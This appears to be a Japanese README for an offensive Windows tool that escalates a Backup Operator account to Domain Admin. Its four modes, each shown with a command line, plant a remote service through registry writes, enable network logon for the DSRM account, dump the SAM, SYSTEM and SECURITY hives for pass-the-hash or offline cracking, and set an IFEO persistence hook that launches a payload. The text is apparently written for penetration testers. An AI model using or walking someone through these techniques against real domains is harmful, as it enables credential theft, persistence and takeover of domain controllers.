
Backup OperatorからDomain Adminへ昇格するために、4つのテクニックを使用: リモートサービス作成、DSRMレジストリ操作、SAM/SYSTEMハイブダンプ、および横移動と特権昇格のためのIFEO永続化。
BackupOperatorToolkit (BOT) には、バックアップオペレーターからドメイン管理者に昇格できる4つの異なるモードがあります。
ツールを実行する前に、"runas.exe /netonly /user:domain.dk\backupoperator powershell.exe" を使用してください。
SERVICEモードは、リモートホストにサービスを作成し、ホストが再起動されたときに実行されます。
このサービスは、リモートレジストリを変更することで作成されます。これは、"REG_OPTION_BACKUP_RESTORE" 値を RegOpenKeyExA および RegSetValueExA に渡すことで可能です。
サービスを即座に実行することはできません。サービス制御マネージャーデータベース "SERVICES_ACTIVE_DATABASE" は起動時にメモリにロードされ、ローカル管理者権限(バックアップオペレーターは持っていません)でのみ変更できるためです。
.\BackupOperatorToolkit.exe SERVICE \\PATH\To\Service.exe \\TARGET.DOMAIN.DK SERVICENAME DISPLAYNAME DESCRIPTION

DSRMモードは、"HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" にある DsrmAdminLogonBehavior レジストリキーを 0、1、または 2 に設定します。
値を0に設定すると、回復モード時のみDSRMアカウントの使用が許可されます。
値を1に設定すると、ディレクトリサービスサービスが停止し、NTDSがロック解除されている場合にDSRMアカウントの使用が許可されます。
値を2に設定すると、WinRMなどのネットワーク認証でDSRMアカウントを使用できるようになります。
DUMPモードが使用され、DSRMアカウントがオフラインで解読された場合は、値を2に設定し、ローカル管理者となるDSRMアカウントでドメインコントローラーにログインします。
.\BackupOperatorToolkit.exe DSRM \\TARGET.DOMAIN.DK 0||1||2

DUMPモードは、SAM、SYSTEM、SECURITY ハイブをリモートホストのローカルパスにダンプするか、ファイルをネットワーク共有にアップロードします。
ハイブがダンプされたら、ドメインコントローラーのハッシュでPtH(パス・ザ・ハッシュ)したり、DSRMを解読してネットワーク認証を有効にしたり、ダンプで見つかった別のアカウントで認証できる可能性があります。他のフォレストからのアカウントがこれらのファイルに保存されている場合があります。理由はわかりませんが、管理フォレストとのエンゲージメントで観察されています。
このモードは、BackupOperatorToDA プロジェクトに触発されています。
.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK

IFEO(Image File Execution Options)は、特定のプロセスが終了したときにアプリケーションを実行できるようにします。
これにより、ターゲットホストが頻繁に使用され、再起動がほとんど行われない場合、SERVICEモードよりも先にシェルを取得できる可能性があります。
実行可能ファイルは、WerFault.exe プロセスの子として実行されます。
.\BackupOperatorToolkit.exe IFEO notepad.exe \\Path\To\pwn.exe \\TARGET.DOMAIN.DK



